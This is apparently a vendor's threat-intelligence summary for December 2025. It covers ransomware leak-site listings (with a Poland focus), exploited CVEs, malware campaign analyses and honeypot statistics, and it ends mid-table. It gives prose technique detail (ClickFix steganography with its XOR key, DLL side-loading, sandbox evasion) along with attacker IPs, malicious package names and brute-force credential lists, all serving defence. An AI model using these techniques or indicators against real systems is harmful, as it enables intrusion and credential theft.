Featured image of post Threats Summary December 2025
RSS - Threats All RSS Feeds Share

Threats Summary December 2025

December 2025 threat intelligence - ransomware landscape, Poland-focused analysis, dark web monitoring, vulnerability exploitation, supply-chain attacks, malicious packages, browser extensions, emerging malware trends, honeypot data, and campaign analysis with IOCs.

Threat intelligence summary based on real-time data from Baysec CTI and complementary open-source intelligence sources. Analysis accelerated by Baysec Intelligence AI.


Table of Contents

  1. BLUF (Bottom Line Up Front)
  2. Executive Summary
  3. Key Trends Observed
  4. Regional Focus: Poland
  5. Dark Web & Breach Intelligence
  6. Vulnerability Intelligence
  7. Campaign Analysis
  8. Malware Inventory
  9. Technical Appendix: Honeypot Intelligence
  10. MITRE ATT&CK Mapping
  11. Indicators of Compromise
  12. Recommendations
  13. Assessment Confidence Levels
  14. Conclusion
  15. References

BLUF (Bottom Line Up Front)

Supply-chain attacks via trusted platforms (GitHub, npm, PyPI) and critical vulnerabilities with active exploitation dominate December 2025. Patch immediately: PHP CGI (CVE-2024-4577, CISA KEV), React Server Components (CVE-2025-55182), n8n (CVE-2025-68613, 103K exposed). Poland: 4 alleged ransomware victims (LockBit5, SAFEPAY, Qilin, Anubis); 2.5M+ Polish credentials leaked. See Indicators of Compromise for blocklist.


Executive Summary

Supply-chain attacks, weaponized open-source repositories, and increasingly evasive malware dominate the current threat landscape. Threat actors abuse legitimate platforms (GitHub, npm, PyPI, Chrome Web Store) to reach developers, security researchers, and ordinary users.

Key Developments

  • Fake exploit repositories distributing Webrat RAT via GitHub, targeting security researchers with lures for recent CVEs
  • Malicious npm package (lotusbail) - 56K+ downloads, hijacks WhatsApp sessions via hardcoded pairing codes; attacker access persists after package removal
  • Critical n8n vulnerability (CVE-2025-68613, CVSS 9.9) with 103K+ exposed instances and public PoC
  • React2Shell exploitation active (CVE-2025-55182) - 223 attacks from 26 IPs with multiple C2 infrastructure
  • PHP CGI mass exploitation (CVE-2024-4577, CVSS 9.8) - 1,276+ attempts deploying RedTail cryptominer
  • Cisco VPN reconnaissance - coordinated probing of AnyConnect infrastructure from cloud IPs
  • Rondo botnet active - Mirai variant exploiting Shellshock, PHPUnit RCE, and OpenWRT vulnerabilities
  • IoT & network device exploitation (965+ events) - Hikvision cameras (CVE-2021-36260), GPON routers, D-Link devices, QNAP NAS (CVE-2024-21899), Realtek SDK routers (CVE-2021-35395), Docker registries exposed
  • Environment file harvesting - 1,761 requests targeting application secrets and cloud credentials
  • Steganography adoption by ClickFix and GhostPoster campaigns to evade detection
  • macOS targeting increase - signed/notarized malware bypassing Gatekeeper (MacSync Stealer, DriverFixer0428)
  • APT37 active targeting South Korean entities via Artemis campaign

Immediate Actions

  1. Patch critical vulnerabilities: n8n, Next.js/React Server Components, PHP CGI, Apache 2.4.49/2.4.50
  2. Audit dependencies: Remove malicious packages from npm (lotusbail) and PyPI (smtrlib)
  3. Remove browser extensions: GhostPoster Firefox extensions (17 total)
  4. Block C2 infrastructure: See Indicators of Compromise for full blocklist

Honeypot Intelligence

11 days of data (Dec 17-27) | 12.3M+ total events captured

Baysec sensors detected persistent exploitation across multiple protocols:

  • SMB/Windows: 1.5M+ authentication events capturing NTLMv2 hashes
  • SSH: 395K+ brute force attempts including Mirai botnet signatures and Solana validator targeting
  • Web exploitation: React2Shell (223), PHP CGI (1,276), PHPUnit RCE (483), environment file harvesting (1,761)
  • Infrastructure probing: Cisco VPN (73), SMTP open relay abuse (2,600) - attackers actively seek mail servers to use as phishing infrastructure, DNS reconnaissance (1,355)

Persistent threat sources: Russia (1.1M+ events) and Egypt (2.4M+ events) dominate attack traffic, with captured credentials revealing compromised corporate Active Directory environments.

Poland Assessment

Ransomware groups listed 4 organizations on leak sites: LockBit5 (mostykatowice.pl, Dec 26), SAFEPAY (polhun.pl, Dec 24-25), Qilin (PODOVIA, Dec 17), Anubis (Duhabex, Dec 5). Verified active threat actors: LockBit5, nova (RALord RaaS) with 10 victims.

Credential exposure: Baysec tracked 2.5M+ Polish credentials across December dumps and combolists; targeted combolists for Polish email providers appearing daily.

Dark Web Monitoring

Baysec CTI discovered 10 new ransomware leak sites in December: evolution, waissbein, osiris, black shrantac, ms13-089, minteye, dark shinigami, cry0, akirat, rustylocker.


TrendDescriptionExamples / Indicators
Supply-chain attacks via package repositoriesThreat actors upload malicious packages to PyPI and npm that steal credentials or download secondary payloads. Attackers use typosquatting, native extensions, or install-time execution.smtrlib (PyPI), lotusbail (npm, 56k+ downloads), runtimeutils, ai-cypher, unizip
Malware-laced browser extensionsExtensions in Chrome Web Store and Firefox Add-ons posing as VPNs/productivity tools intercept traffic and harvest credentials.Phantom Shuttle (Chrome), GhostPoster (Firefox, 17 extensions, 50k+ downloads)
GitHub as malware distributionRepositories pretending to be exploits for high-profile CVEs lure security researchers. AI-generated descriptions and password-protected archives drop malware.Webrat campaigns (CVE-2025-59295, CVE-2025-10294)
Steganography & evasionThreat actors hide malicious code inside image files. macOS stealers shift to signed/notarized Swift applications.ClickFix (LummaC2, Rhadamanthys), MacSync Stealer
Multi-platform credential stealersInfostealers targeting macOS and Windows via fake updates, game cheats, or cracked software.DriverFixer0428 (DPRK), Odyssey infostealer
Infostealer ecosystem at critical massInfostealer logs flood dark web markets daily. Threat actors trade fresh credentials within hours of theft. Lumma, Redline, Vidar, Raccoon dominate. Corporate VPN/SSO credentials fuel ransomware initial access.Daily credential dumps on Russian Market, Genesis Market successors; Polish email providers heavily targeted
Ransomware activityBaysec CTI tracks new ransomware families in intelligence feeds.Abyss, Underground ransomware
Rapid CVE weaponizationFlood of GitHub Gist-hosted PoC exploits for recently disclosed vulnerabilities.CVE-2025-68613 (n8n RCE, CVSS 9.9), CVE-2025-67443, CVE-2025-62094
APT social-engineeringNorth Korean APT37 impersonates Korean TV writers to deliver malicious HWP documents.Artemis campaign
Multi-stage operationsCampaigns use several stages (fake updates -> stego-loaded images -> manual execution) to evade detection.ClickFix campaign
Developer targetingMalicious packages and fake exploit repos aim at inexperienced security professionals.Webrat’s pivot from game cheats to “exploit” repositories
Mass credential harvesting & phishing infrastructureHigh-volume SSH brute force (366K+) and SMB authentication capture (1.4M+) targeting Windows/Linux infrastructure. SMTP honeypots detected 2,582 phishing distribution attempts - open relay abuse for financial and crypto scam campaigns. Egypt (2.4M+ events) and Russia (1.1M+ events) are persistent sources.Baysec sensors: Russia: 1C:Enterprise credentials (USR1CV8); top SSH: root/123456, Mirai (345gs5662d34), Solana targeting (sol, solana, solv)

Regional Focus: Poland

Intrusion-Sets Targeting Poland (December 2025)

Ransomware / Major Threat Groups

Threat ActorTypeDecember 2025 StatusNotes
LockBit5RaaSVERIFIED (Dec 26, 2025)Listed mostykatowice.pl on leak site
nova (formerly RALord)RaaSVERIFIED (10 victims Dec 2025)Ransomware-as-a-Service; includes TELE-FONIKA Cable Americas (Dec 9)
SAFEPAYRansomwareVERIFIED (leak site listing)Listed polhun.pl on Dec 24-25
QilinRaaSVERIFIED (leak site listing)Listed PODOVIA on Dec 17
AnubisRansomwareVERIFIED (leak site listing)Listed Duhabex on Dec 5

Hacktivist / Defacement Groups

Threat ActorTypeDecember 2025 Status
Perun SvarogaHacktivistVERIFIED and ACTIVE (Dec 7, 2025)
NoName057(16)Pro-Russia DDoSActive globally (10 attacks Dec 2025) - shifted focus away from Poland to France, Belgium, Denmark, Ukraine
Tunisian Maskers Cyber ForceHacktivistTargeting Poland (unverified Dec 2025)
RABBIT CYBER TEAMHacktivistTargeting Poland (unverified Dec 2025)
D4RK 4RMYHacktivistPreviously active (last: Aug 2025)
SECT0R 16HacktivistTargeting Poland (unverified Dec 2025)
Z-ALLIANCEHacktivistPreviously active (last: Sep 2025)
UNIT 1948HacktivistPreviously active (last: Aug 2025)
R3V0XAn0nymousHacktivistPreviously active (last: Jun 2025)
BlackH0leHacktivistTargeting Poland (unverified Dec 2025)
Black EmberHacktivistTargeting Poland (unverified Dec 2025)
Mr RootHacktivistTargeting Poland (unverified Dec 2025)

Data Brokers & Initial Access Sellers

ActorFocusDecember 2025 Status
hitesh, Wieko, shamirrrrious, arsanelupin222General data brokerageActive on forums
aisdata, BioHack, corptodayCorporate/sector dataActive on forums
BestcomboCombolist vendorActive on forums
telecomsTelecom-specific dataActive on forums
KontrolaPracyPolish-focusedPreviously active (last: Jun 2025)
CebulkowiczPolish-focusedPreviously active (last: May 2025)

Alleged Ransomware Victims (Poland - December 2025)

DISCLAIMER: Ransomware groups listed the following organizations on their leak sites. Inclusion here indicates the threat actors claim to have compromised these organizations. This does not constitute confirmation of a successful breach - threat actors may have incorrectly listed organizations, victims may have paid ransom (data removed then re-added), or threat actors may have fabricated listings for reputation purposes.

OrganizationThreat ActorDate ListedLeak Site Status
mostykatowice.pl (construction)LockBit5Dec 26, 2025Listed on leak site
polhun.pl (chemical manufacturer)SAFEPAYDec 24-25, 2025Data allegedly posted
PODOVIAQilinDec 17, 2025Listed on leak site
DuhabexAnubisDec 5, 2025Listed on leak site

Analyst Note: Four distinct ransomware groups listed Polish organizations on their leak sites in December 2025. LockBit5 continues the LockBit franchise post-Operation Cronos; Qilin is a sophisticated RaaS operator with global reach; SAFEPAY and Anubis are mid-tier operators.


Dark Web & Breach Intelligence

December 2025 Ransomware Landscape

December 2025 Statistics: 781 confirmed victims across 58 ransomware groups

Most Active Ransomware Groups (December 2025)

RankGroupVictimsRankGroupVictims
1Qilin1229INC Ransom25
2Kairos8810Coinbase Cartel17
3Devman26411Everest15
4Akira6412Direwolf14
5Sinobi4813Lynx13
6LockBit54514Play12
7SafePay4315WorldLeaks11
8DragonForce2816The Gentlemen11

Critical Global Incidents

DateVictimGroupDataImpact
Dec 25Wall Street EnglishINC Ransom3.5 TBGlobal language academy
Dec 25The Salvation ArmyInterlockUnknownHumanitarian org
Dec 24NCR, Tri-State Metal, Prime LabelDragonForceUnknownMulti-victim
Dec 22-23Romanian Waters AuthorityBitLocker1,000 systemsCritical infrastructure
Dec 22University of PhoenixClop3.5M individualsOracle EBS exploit
Dec 19Gladinet CentreStackClop59K serversMass exploitation

New Ransomware Leak Sites (December 2025)

GroupStatusGroupStatus
evolutionACTIVEdark shinigamiACTIVE
waissbeinACTIVEcry0ACTIVE
osirisACTIVEakiratACTIVE
black shrantacACTIVErustylockerACTIVE
ms13-089ACTIVEminteyeACTIVE

Ransomware Tool Leaks

DateLeakForumRisk
Dec 22VanHelsing Sourcegerki.pwHIGH
Dec 22NoCry Builderxforums.stMEDIUM
Dec 23Ransomware Dev Courseniflheim.topMEDIUM

Breach Reports & Credential Leaks

Polish Credential Exposure

Baysec CTI tracked credential dumps targeting Polish organizations:

SourceVolumeDateRisk
Polish email providers2.5M+ combinedDec 2025HIGH
Historical breach recirculationOngoingThroughout DecMEDIUM

Major Credential Leaks (Global)

SourceRecordsType
wakanim.tv (France)6.7MAnime platform accounts
ICMR + Hi-Tek IndiaUnknownHealthcare data
Fresh Indian Passport + SelfieUnknownIdentity documents
SerpaExperian BrazilUnknownCredit bureau data
LastPass 2022 VaultsOngoing (still active in 2025)Crypto theft via decryption

Vulnerability Intelligence

Vulnerabilities Used as Lures (Webrat Campaign)

Assessment: Threat actors leverage recently disclosed, high-profile vulnerabilities as social engineering lures. Threat actors use the following CVEs to create convincing fake exploit repositories.
Confidence: HIGH (based on Kaspersky analysis of 15 malicious repositories)

CVE IdentifierCVSSAffected ProductVulnerability DescriptionWeaponization Context
CVE-2025-59295HighWindows MSHTML / Internet ExplorerHeap-based buffer overflow in the MSHTML rendering engine. Attackers can achieve remote code execution by sending specially crafted data over the network that triggers memory corruption. The vulnerability affects the legacy Trident engine still present in Windows for compatibility.Webrat operators use this as lure in fake GitHub repositories. No legitimate exploit exists in malicious repos - archives contain Webrat dropper instead.
CVE-2025-10294CriticalOwnID Passwordless Login (WordPress Plugin)Authentication bypass due to improper validation of the shared secret mechanism. Unauthenticated attackers can log in as arbitrary users, including administrators, without providing credentials. Affects WordPress sites using this popular passwordless authentication plugin.High interest from WordPress administrators makes this an effective lure. Fake PoCs target security researchers investigating WordPress vulnerabilities.
CVE-2025-59230HighWindows Remote Access Connection Manager (RasMan)Elevation-of-privilege vulnerability. A locally authenticated attacker can exploit improper access control in the RasMan service to escalate privileges from standard user to SYSTEM level on affected Windows installations.Local privilege escalation vulnerabilities attract red teamers and pentesters - ideal target demographic for Webrat operators.

Analyst Note: The selection of these CVEs demonstrates operational sophistication. All three are recent, have media coverage, and affect widely-deployed products. The Webrat operators specifically chose vulnerabilities that would attract security professionals rather than general users.

Actively Weaponized Vulnerabilities

Assessment: The following vulnerabilities have confirmed public exploits and threat actors actively scan or exploit them in the wild.
Confidence: HIGH (NVD data, Censys scanning data, PoC repositories confirm active exploitation)

CVE IdentifierCVSSAffected ProductVulnerability DescriptionExploitation StatusExposure
CVE-2024-45779.8PHP CGI (Windows)Argument Injection leading to RCE. PHP CGI on Windows fails to properly sanitize certain character sequences, allowing attackers to inject arguments and execute arbitrary code. Affects PHP before 8.1.29, 8.2.20, 8.3.8 on Windows with specific locale configurations.ACTIVELY EXPLOITED. CISA lists in KEV. RedTail cryptominer conducts mass exploitation. EPSS: 94.37%.Windows PHP CGI deployments
CVE-2025-686139.9n8n Workflow Automation (versions 0.211.0 to <1.120.4)Remote Code Execution via Expression Injection. The n8n platform allows JavaScript expressions inside workflows wrapped in {{ }} syntax, evaluated server-side using Node.js. Insufficient isolation of the expression evaluation context allows authenticated attackers to escape the sandbox and execute arbitrary code with the privileges of the n8n process. Exploitation requires authentication but published PoCs lower the technical barrier significantly.Public PoC available. Baysec sensors detect active scanning. No confirmed ITW exploitation yet.103,476 vulnerable instances (Censys, Dec 22 2025). Majority in US, Germany, France, Brazil, Singapore.
CVE-2025-67443MediumSchlix CMSCross-Site Scripting (XSS). Insufficient input sanitization allows injection of malicious scripts into web pages viewed by other users. Can be leveraged for session hijacking, credential theft, or further exploitation.GitHub Gist PoC available.Unknown
CVE-2025-62094HighWordPress Plugin (unspecified)Unauthorized access/code execution in WordPress plugin. Specific technical details pending full disclosure.GitHub Gist PoC available.Potentially millions of WordPress installations
CVE-2025-55182CriticalReact Server ComponentsRemote Code Execution. Improper handling of serialized data in React Server Components implementation allows attackers to execute arbitrary code on the server. Affects applications using vulnerable RSC implementations.ACTIVELY EXPLOITED. Baysec captured 223 attacks with confirmed C2.Applications using React Server Components / Next.js
CVE-2025-15007HighTenda WH450 RouterBuffer overflow in router firmware. Exploitation allows remote code execution and complete device compromise. Attackers can gain persistent access to network infrastructure.Trickest-hosted exploit available.Consumer and SOHO networks
CVE-2019-16278CriticalNostromo nhttpd Web ServerDirectory traversal and RCE. Path traversal vulnerability allows unauthenticated attackers to execute arbitrary commands on the underlying system. Well-documented and reliable exploitation.Metasploit module available. Widely exploited.Legacy web servers
CVE-2021-417739.8Apache HTTP Server 2.4.49/2.4.50Path Traversal leading to RCE. Improper path normalization allows attackers to map URLs to files outside the expected document root. With mod_cgi enabled, leads to remote code execution.ACTIVELY EXPLOITED. Baysec captured 402 attempts.Apache 2.4.49/2.4.50 servers
CVE-2017-98419.8PHPUnitRemote Code Execution via eval-stdin.php. Unprotected eval-stdin.php endpoint in PHPUnit allows unauthenticated attackers to execute arbitrary PHP code. Common in development environments accidentally exposed to production.ACTIVELY EXPLOITED. Baysec captured 483 attempts.PHP applications with exposed PHPUnit
CVE-2021-362609.8Hikvision IP CamerasCommand Injection via /SDK/webLanguage. Unauthenticated attackers can inject commands via crafted requests to the web management interface. Leads to full device compromise.ACTIVELY EXPLOITED. Baysec captured 103 attempts.Hikvision IP cameras/NVRs
CVE-2020-34527.5Cisco ASA/FTD (AnyConnect)Path Traversal. Improper input validation in the web services interface allows unauthenticated attackers to read sensitive files from the device. Can expose configuration and credentials.ACTIVELY EXPLOITED. Baysec captured 73 probing attempts.Cisco ASA/FTD with AnyConnect
CVE-2014-62719.8GNU Bash (Shellshock)Remote Code Execution via environment variables. Bash incorrectly processes trailing strings after function definitions, allowing attackers to execute arbitrary commands. Exploited via CGI, SSH, DHCP.ACTIVELY EXPLOITED. Rondo botnet uses in mass scanning (441+ events).Linux/Unix systems with exposed Bash
CVE-2023-13898.8TP-Link Archer (OpenWRT LuCI)Command Injection via locale parameter. Unauthenticated attackers can inject commands via the country parameter in the web interface. Leads to full router compromise.ACTIVELY EXPLOITED. Rondo botnet uses in mass scanning.TP-Link routers, OpenWRT devices
CVE-2025-3132410.0SAP NetWeaverUnauthenticated File Upload. The metadatauploader endpoint allows unauthenticated attackers to upload arbitrary files, leading to remote code execution.ACTIVELY EXPLOITED. Baysec captured 24 attempts.SAP NetWeaver deployments
CVE-2024-364019.8GeoServerOGC Filter SQL Injection leading to RCE. Improper evaluation of property names as XPath expressions allows unauthenticated attackers to execute arbitrary code.ACTIVELY EXPLOITED. Baysec captured 18 attempts.GeoServer instances

Priority Assessment:

  1. CRITICAL - CVE-2024-4577: Patch immediately. CISA KEV, EPSS 94.37%, mass exploitation by RedTail. Block 178.16.55.224.
  2. CRITICAL - CVE-2025-55182: Patch immediately. Threat actors actively exploit with confirmed C2 infrastructure. Block 94.154.35.154 and 193.142.147.209.
  3. CRITICAL - CVE-2025-68613: Patch immediately. 103k+ exposed instances with public PoC represents significant risk.
  4. MEDIUM - Other CVEs: Monitor for exploitation; patch during normal maintenance windows.

Campaign Analysis

Campaign: Webrat RAT via Fake GitHub Exploits

Attribution: Unknown criminal actor (likely financially motivated)
Confidence: HIGH
First Observed: May 2025 (game cheats); September 2025 (pivot to fake exploits)
Status: ACTIVE (GitHub removed repositories, but operators will likely create new ones)

Summary: Kaspersky researchers discovered 15 malicious GitHub repositories distributing Webrat malware disguised as PoC exploits for the high-profile vulnerabilities documented above.

Targeting: Originally gamers (Rust, Counter-Strike, Roblox cheats). Since September 2025, operators pivoted to security researchers and students - likely to access more valuable credentials and potentially compromise security tooling.

Technical Execution:

Phase 1: Initial Access

  • Victim discovers GitHub repository claiming PoC for CVE-2025-XXXXX
  • Repository contains AI-generated README with convincing technical details
  • Operators offer password-protected archive for download

Phase 2: Execution

  • Victim extracts and executes rasmanesc.exe
  • Dropper attempts privilege escalation
  • Dropper disables Windows Defender via registry/policy manipulation
  • Dropper downloads Webrat payload from hardcoded C2 URL

Phase 3: Actions on Objectives

  • Exfiltrates cryptocurrency wallets
  • Steals Steam/Discord/Telegram credentials
  • Enables webcam surveillance
  • Captures screenshots
  • Logs keystrokes for additional credential harvesting

Indicators:

  • Password-protected archives in GitHub repositories
  • AI-generated README content (generic phrasing, formatting inconsistencies)
  • File: rasmanesc.exe (dropper)
  • Targeting recently disclosed CVEs with media coverage

Campaign: ClickFix Steganography

Attribution: Unknown criminal actor
Confidence: HIGH
First Observed: October 2025
Status: ACTIVE (infrastructure partially disrupted by Operation Endgame, November 2025)

Summary: Huntress documented a multi-stage attack combining social engineering with steganography. Security researchers track the campaign since October 2025. Attackers embed malicious payloads in images and trick users into executing PowerShell commands.

Technical Execution:

Phase 1: Social Engineering (ClickFix)

  • Victim encounters fake Windows Update full-screen interface
  • Interface instructs user to press Win+R
  • Malware auto-pastes malicious command from clipboard
  • User executes MSHTA payload

Phase 2: Payload Retrieval

  • MSHTA contacts C2 at 141.98.80.175
  • MSHTA downloads and executes PowerShell script
  • PowerShell retrieves PNG images containing hidden payloads

Phase 3: Steganography Extraction

  • Custom algorithm targets red channel of BGRA pixel data
  • Extracts shellcode by XORing calculated values with red channel bytes
  • XOR key: 114
  • Loader injects decrypted shellcode into memory

Phase 4: Execution

  • Donut-packed payload executes entirely in memory
  • Malware creates no disk artifacts
  • ctrampoline technique: 10,000 empty function calls to evade analysis
  • Final payload: LummaC2 or Rhadamanthys infostealer

Evasion Assessment: SOPHISTICATED

  • Memory-only execution defeats file-based detection
  • Steganography bypasses network content inspection
  • ctrampoline technique complicates dynamic analysis
  • Legitimate-appearing image files avoid suspicion

Infrastructure:

  • C2: 141.98.80.175 (MSHTA stages, PowerShell loaders)
  • Payload delivery: PNG images on attacker-controlled servers

Payloads: LummaC2, Rhadamanthys


Campaign: GhostPoster Firefox Extensions

Attribution: Unknown criminal actor (financially motivated - ad fraud, affiliate hijacking)
Confidence: HIGH
First Observed: September 2025
Status: MITIGATED (Mozilla removed extensions)

Summary: Koi Security uncovered 17 compromised Firefox extensions with 50,000+ combined downloads. Attackers use steganography to hide malicious JavaScript in extension icons.

Kill Chain Analysis:

PhaseMITRE ATT&CKDescription
DeliveryT1189 Drive-by CompromiseUser installs extension from Firefox Add-ons store
InstallationT1176 Browser ExtensionsMalicious extension persists in browser
Defense EvasionT1027.003 SteganographyPayload hidden in PNG icon after === marker
Defense EvasionT1497 Sandbox Evasion48-hour dormancy, 10% activation probability
CollectionT1185 Browser Session HijackingAffiliate link hijacking, cookie manipulation
ImpactT1565 Data ManipulationSecurity header stripping (CSP, X-Frame-Options), ad fraud

Affected Extensions:

Extension NameDownloadsStatus
Free VPN Forever16,000+Removed
screenshot-saved-easyUnknownRemoved
weather-best-forecastUnknownRemoved
google-translate-pro-extensionUnknownRemoved
dark-reader-for-ffUnknownRemoved

Remediation: Mozilla removed all extensions and updated automated detection systems.


Campaign: lotusbail npm Package (WhatsApp Stealer)

Attribution: Unknown criminal actor
Confidence: HIGH
First Observed: May 2025
Status: ACTIVE (npm removed package, but attacker access persists for infected users)

Summary: Koi Security discovered a malicious npm package with 56,000+ downloads. The package provides a functional WhatsApp API while simultaneously exfiltrating credentials to attacker infrastructure.

Technical Execution:

Phase 1: Developer Integration

  • Developer installs lotusbail for WhatsApp functionality
  • Attacker based package on legitimate Baileys library
  • Package provides real, working WhatsApp API functions

Phase 2: Credential Harvesting

  • Library hijacks 8-character device pairing code mechanism
  • Hardcoded pairing code adds attacker device as trusted endpoint
  • Library intercepts all messages in real-time
  • Library harvests contacts
  • Library steals credentials and AES-encrypts before exfiltration

Phase 3: Persistence

  • CRITICAL: Attacker’s linked device remains connected even after package removal

Anti-Analysis Capabilities:

  1. 27 infinite loop traps detect debugging tools
  2. Unicode variable manipulation obfuscation
  3. LZString compression
  4. Base-91 encoding
  5. AES encryption of exfiltrated data

CRITICAL REMEDIATION NOTE: Uninstalling the package does NOT remove attacker access. Victims must manually unlink ALL devices from WhatsApp settings.


Campaign: MacSync Stealer Evolution

Attribution: Criminal actor “Mentalpositive”
Confidence: HIGH
First Observed: April 2025 (as Mac.C); July 2025 (rebrand to MacSync)
Status: MITIGATED (Apple revoked certificate)

Summary: This macOS infostealer evolved to use signed and notarized Swift applications, bypassing Gatekeeper and XProtect. Jamf Threat Labs analyzed the evolution and documented new evasion techniques.

Technical Execution:

Phase 1: Distribution

  • Victim downloads zk-call-messenger-installer-3.9.2-lts.dmg
  • Source: zkcall.net/download
  • Attacker inflates DMG to 25.5MB with decoy PDFs

Phase 2: Gatekeeper Bypass

  • Legitimately signed and notarized Swift application
  • Initial app contains NO malware (passes all checks)
  • Gatekeeper and XProtect approve execution

Phase 3: Payload Retrieval

  • App performs internet connectivity check (sandbox evasion)
  • App retrieves encoded script from remote server
  • App decodes and executes script

Phase 4: Credential Theft

  • Exfiltrates iCloud Keychain credentials
  • Extracts browser passwords
  • Collects system metadata
  • Steals cryptocurrency wallet data
  • Go-based agent provides full C2 capability

Phase 5: Cleanup

  • Wipes scripts after execution
  • Removes temp files
  • Memory-only execution minimizes forensic artifacts

Remediation Status: Apple revoked the developer certificate after Jamf’s report.


Campaign: APT37 Artemis

Attribution: APT37 / Reaper / ScarCruft (North Korea, state-sponsored)
Confidence: HIGH
First Observed: October 2023 (C2 infrastructure); December 2025 (current campaign)
Status: ACTIVE

Summary: North Korean threat group APT37 targets South Korean academics, journalists, and policy experts via social engineering. Genians Security Center analyzed the campaign and attributed it to DPRK state actors.

Targeting: Individuals with expertise in:

  • North Korean affairs
  • Human rights issues
  • Korean peninsula policy

Technical Execution:

Phase 1: Social Engineering

  • Spearphishing email from “Korean TV program writer”
  • Proposes interview about North Korean affairs
  • Attachment: Malicious HWP (Hangul Word Processor) document

Phase 2: Initial Compromise

  • Victim opens HWP document and enables content
  • Malicious OLE object executes
  • Malware deploys files to temporary folder

Phase 3: DLL Side-Loading

  • Executes legitimate Microsoft Sysinternals utilities
  • Places malicious version.dll in same directory
  • Windows loads attacker DLL instead of legitimate library
  • Executables: vhelp.exe, mhelp.exe

Phase 4: Payload Decryption

  • Multi-stage XOR decryption
  • Loader activates final shellcode

Phase 5: RoKRAT Deployment

  • Data-stealing payload with full remote access capability

C2 Infrastructure:

PlatformRegionAccountRegistration
Yandex CloudRussiatanessha.samuelOctober 2023
pCloudSwitzerlandtanessha.samuelOctober 2023

Analyst Note: Geographic separation of C2 across Russia and Switzerland demonstrates deliberate tradecraft to complicate attribution and evade geographic blocking.


Campaign: DriverFixer0428 (Contagious Interview)

Attribution: Contagious Interview / DEV#POPPER (North Korea, state-sponsored)
Confidence: HIGH
First Observed: 2023 (campaign); December 2025 (current sample)
Status: PARTIALLY DISRUPTED (FBI seized BlockNovas domain, April 2025)

Summary: Security researchers attribute macOS credential stealer to North Korean Contagious Interview campaign.

Targeting: Software developers and cryptocurrency professionals seeking employment.

Technical Execution:

Phase 1: Social Engineering

  • Victim contacted for fake job interview
  • Request to install “VCam” or “CameraAccess” for video call
  • Malware delivered as required interview software

Phase 2: Credential Harvesting

  • OverlayWindowController creates fullscreen overlay
  • Overlay prevents interaction until credentials entered
  • Impersonates macOS system prompts
  • Impersonates Chrome permission dialogs

Phase 3: Sandbox Evasion

  • sysctlbyname API checks for VM
  • IOKit checks for virtualization
  • NSScreen checks for analysis environment
  • Static analysis: clearly malicious; Dynamic sandbox score: 4/10 “likely benign”

Phase 4: Exfiltration

  • Credentials sent to attacker via Dropbox API

Law Enforcement Action: FBI seized BlockNovas domain (April 2025).


Malware Inventory

MalwareTypePlatformAttributionNotes
WebratBackdoor/RATWindowsCriminalFake GitHub exploits; crypto/credential theft; screen recording; keylogging
MacSync StealerInfostealermacOSCriminal (Mentalpositive)Signed/notarized Swift apps; Go-based C2 agent
DriverFixer0428Credential StealermacOSDPRK (Contagious Interview)Fullscreen overlay; Dropbox exfil
OdysseyInfostealerWindowsCriminalCredential theft
RUSTRIC / PYTRICMalware familiesCross-platformUnknownExtensive ATT&CK technique coverage
ShellcodeRunnerDropperWindowsUnknownMulti-stage attack component
Abyss / UndergroundRansomwareWindowsCriminalNewly tracked families
LummaC2InfostealerWindowsCriminalClickFix/steganography delivery
RhadamanthysInfostealerWindowsCriminalClickFix/steganography delivery
RoKRATRATWindowsDPRK (APT37)Artemis campaign payload

Technical Appendix: Honeypot Intelligence

Baysec Sensor Analysis (December 2025)

Data Source: Baysec Sensor cluster
Period: December 17-27, 2025 (11 days)
Total Events: 12.3M+ events
Risk Level: HIGH - Sustained

Top Threat Actors by Attack Volume

RankSource IPCountryOrganizationEventsPrimary TargetComment
1159.195.63.33🇩🇰 DenmarkDXC Technology364,336SMB/RDPCVE-2020-0796 (SMBGhost)
2189.124.135.33🇧🇷 BrazilAlares Cabo312,299MSSQL (1433)SQL Server 2022 targeting
334.29.105.211🇺🇸 USAGoogle Cloud252,507Multi-serviceCVE-2023-44487 (HTTP/2 Rapid Reset) + 11 others
4113.160.186.2🇻🇳 VietnamVNPT229,560SMBCompromised hospital
541.35.41.90🇪🇬 EgyptTE Data186,396SMB-
623.30.86.197🇺🇸 USAComcast (Houston)166,823MixedResidential IP
7191.6.143.142🇧🇷 BrazilClaro146,204SMB-
8197.43.35.230🇪🇬 EgyptTE Data142,845Mixed-
985.175.217.90🇷🇺 RussiaRostelecom (Krasnodar)129,360Mixed-

Primary Threat: 159.195.63.33 (DXC Technology, Denmark) is the top attacking IP with 364K+ events targeting SMB/RDP services, exploiting CVE-2020-0796 (SMBGhost).

SMB Bruteforce Campaign Analysis (Port 445)

Attack Volume: PRIMARY ATTACK VECTOR

RankAttacker IPCountrySMB EventsTechnique
1189.124.135.33🇧🇷 Brazil138,692NTLM brute force
2113.160.186.2🇻🇳 Vietnam103,889SMB1/SMB2 negotiation
341.35.41.90🇪🇬 Egypt82,773IPC$ enumeration
4191.6.143.142🇧🇷 Brazil64,917Credential stuffing

SMB Attack Techniques Baysec Observed:

  • SMB1/SMB2 protocol negotiation (downgrade attacks)
  • NTLM authentication brute force
  • IPC$ share enumeration (\\192.168.56.20\IPC$, \\192.168.1.1\IPC$)
  • STATUS_ACCESS_DENIED (0xc0000022) response harvesting
  • STATUS_MORE_PROCESSING_REQUIRED (0xc0000016) exploitation

Legacy Systems Targeted: Honeypot responses show attackers probing for Windows Server 2003 3790 Service Pack 2 - indicating searches for EOL/unpatched systems.

MSSQL Attack Patterns (Port 1433)

Concentrated Attack Source: IP range 185.242.246.* (coordinated scanning/exploitation)

Attack Techniques:

  • Port 1433 scanning and connection attempts
  • Database credential brute forcing (sa, admin accounts)
  • TDS protocol exploitation attempts
  • SQL Server version fingerprinting

Primary Attacker: 189.124.135.33 (Brazil) running Microsoft SQL Server 2022 GDR (16.0.1121.0) - attackers likely use this compromised database server for attacks.

SSH Bruteforce Analysis (Port 22)

Data Source: Baysec SSH honeypot
Total Events: 366,000+ authentication attempts (December 2025)
Successful Logins (honeypot): 1,401+ events
MITRE ATT&CK: T1110.001 - Brute Force: Password Guessing, T1110.003 - Password Spraying

Top 10 Usernames Attempted:

RankUsernameCount% of TotalNotes
1root34,3279.4%Linux/Unix superuser
2sol3,5691.0%Cryptocurrency (Solana)
3admin3,5431.0%Generic admin
4solana2,1560.6%Cryptocurrency
5user2,0130.5%Generic user
6test1,8840.5%Test accounts
7solv1,7420.5%Solana validator
8ubuntu1,6550.5%Ubuntu default
9oracle1,6000.4%Database service
10postgres1,3220.4%PostgreSQL

Top 10 Passwords Attempted:

RankPasswordCount% of TotalPattern
11234563755.11%Sequential
